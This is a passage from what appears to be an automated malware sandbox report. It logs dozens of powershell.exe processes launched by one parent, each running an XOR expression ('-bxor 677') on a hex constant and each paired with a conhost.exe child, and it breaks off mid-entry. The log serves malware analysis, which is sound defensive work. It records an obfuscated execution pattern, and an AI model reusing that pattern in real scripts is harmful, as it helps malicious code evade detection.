Commandline:	powershell.exe 0x6C416EC9 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1272, Parent PID: 5796

General

Target ID:	52
Start time:	09:35:18
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6124, Parent PID: 408

General

Target ID:	53
Start time:	09:35:19
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6F632ACC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1764, Parent PID: 6124

General

Target ID:	54
Start time:	09:35:19
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5736, Parent PID: 408

General

Target ID:	55
Start time:	09:35:19
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x302C6B85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4760, Parent PID: 5736

General

Target ID:	56
Start time:	09:35:19
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6824, Parent PID: 408

General

Target ID:	57
Start time:	09:35:20
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30783395 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5952, Parent PID: 6824

General

Target ID:	58
Start time:	09:35:20
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 3160, Parent PID: 408

General

Target ID:	59
Start time:	09:35:21
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30303295 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1580, Parent PID: 3160

General

Target ID:	60
Start time:	09:35:21
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6820, Parent PID: 408

General

Target ID:	61
Start time:	09:35:22
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C206B85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1336, Parent PID: 6820

General

Target ID:	62
Start time:	09:35:22
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 3540, Parent PID: 408

General

Target ID:	63
Start time:	09:35:22
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30783195 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5772, Parent PID: 3540

General

Target ID:	64
Start time:	09:35:22
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2956, Parent PID: 408

General

Target ID:	65
Start time:	09:35:23
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x30302E85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4700, Parent PID: 2956

General

Target ID:	66
Start time:	09:35:23
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1812, Parent PID: 408

General

Target ID:	67
Start time:	09:35:24
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x692032DD -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1528, Parent PID: 1812

General

Target ID:	68
Start time:	09:35:24
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1224, Parent PID: 408

General

Target ID:	69
Start time:	09:35:24
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x34302BD5 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4312, Parent PID: 1224

General

Target ID:	70
Start time:	09:35:25
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4976, Parent PID: 408

General

Target ID:	71
Start time:	09:35:25
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2E7233FC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1248, Parent PID: 4976

General

Target ID:	72
Start time:	09:35:25
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4456, Parent PID: 408

General

Target ID:	73
Start time:	09:35:26
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6B6570CB -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6200, Parent PID: 4456

General

Target ID:	74
Start time:	09:35:26
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5760, Parent PID: 408

General

Target ID:	75
Start time:	09:35:27
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x656C3197 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1808, Parent PID: 5760

General

Target ID:	76
Start time:	09:35:27
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2368, Parent PID: 408

General

Target ID:	77
Start time:	09:35:28
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x3A3A51C0 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4624, Parent PID: 2368

General

Target ID:	78
Start time:	09:35:28
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 3536, Parent PID: 408

General

Target ID:	79
Start time:	09:35:29
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x74466BC9 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3188, Parent PID: 3536

General

Target ID:	80
Start time:	09:35:29
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6344, Parent PID: 408

General

Target ID:	81
Start time:	09:35:29
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x65506DCC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5912, Parent PID: 6344

General

Target ID:	82
Start time:	09:35:29
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 4488, Parent PID: 408

General

Target ID:	83
Start time:	09:35:30
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6E7467D7 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1576, Parent PID: 4488

General

Target ID:	84
Start time:	09:35:30
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7620, Parent PID: 408

General

Target ID:	85
Start time:	09:35:31
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x28697096 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7088, Parent PID: 7620

General

Target ID:	86
Start time:	09:35:31
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6852, Parent PID: 408

General

Target ID:	87
Start time:	09:35:31
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2C206B85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1376, Parent PID: 6852

General

Target ID:	88
Start time:	09:35:32
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 3468, Parent PID: 408

General

Target ID:	89
Start time:	09:35:32
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x31343091 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6668, Parent PID: 3468

General

Target ID:	90
Start time:	09:35:32
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7588, Parent PID: 408

General

Target ID:	91
Start time:	09:35:33
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x202C22CC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 6152, Parent PID: 7588

General

Target ID:	92
Start time:	09:35:33
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7632, Parent PID: 408

General

Target ID:	93
Start time:	09:35:34
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x20302ECC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 5348, Parent PID: 7632

General

Target ID:	94
Start time:	09:35:34
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5272, Parent PID: 408

General

Target ID:	95
Start time:	09:35:34
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x20302BCC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4608, Parent PID: 5272

General

Target ID:	96
Start time:	09:35:35
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7464, Parent PID: 408

General

Target ID:	97
Start time:	09:35:35
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x2E7230FC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2716, Parent PID: 7464

General

Target ID:	98
Start time:	09:35:35
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 180, Parent PID: 408

General

Target ID:	99
Start time:	09:35:36
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6B6570CB -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1552, Parent PID: 180

General

Target ID:	100
Start time:	09:35:36
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5772, Parent PID: 408

General

Target ID:	101
Start time:	09:35:37
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x656C3197 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 7228, Parent PID: 5772

General

Target ID:	102
Start time:	09:35:37
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 6668, Parent PID: 408

General

Target ID:	103
Start time:	09:35:38
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x3A3A50C0 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3468, Parent PID: 6668

General

Target ID:	104
Start time:	09:35:38
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 1628, Parent PID: 408

General

Target ID:	105
Start time:	09:35:38
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x616444CC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 1528, Parent PID: 1628

General

Target ID:	106
Start time:	09:35:38
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 2360, Parent PID: 408

General

Target ID:	107
Start time:	09:35:39
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x6C652ACC -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 3252, Parent PID: 2360

General

Target ID:	108
Start time:	09:35:39
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7056, Parent PID: 408

General

Target ID:	109
Start time:	09:35:40
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
Commandline:	powershell.exe 0x72332E85 -bxor 677
Imagebase:
File size:	433152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 2920, Parent PID: 7056

General

Target ID:	110
Start time:	09:35:40
Start date:	05/10/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6f2610000
File size:	875008 bytes
MD5 hash:	81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 7736, Parent PID: 408

General

Target ID:	111
Start time:	09:35:41
Start date:	05/10/2022
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):
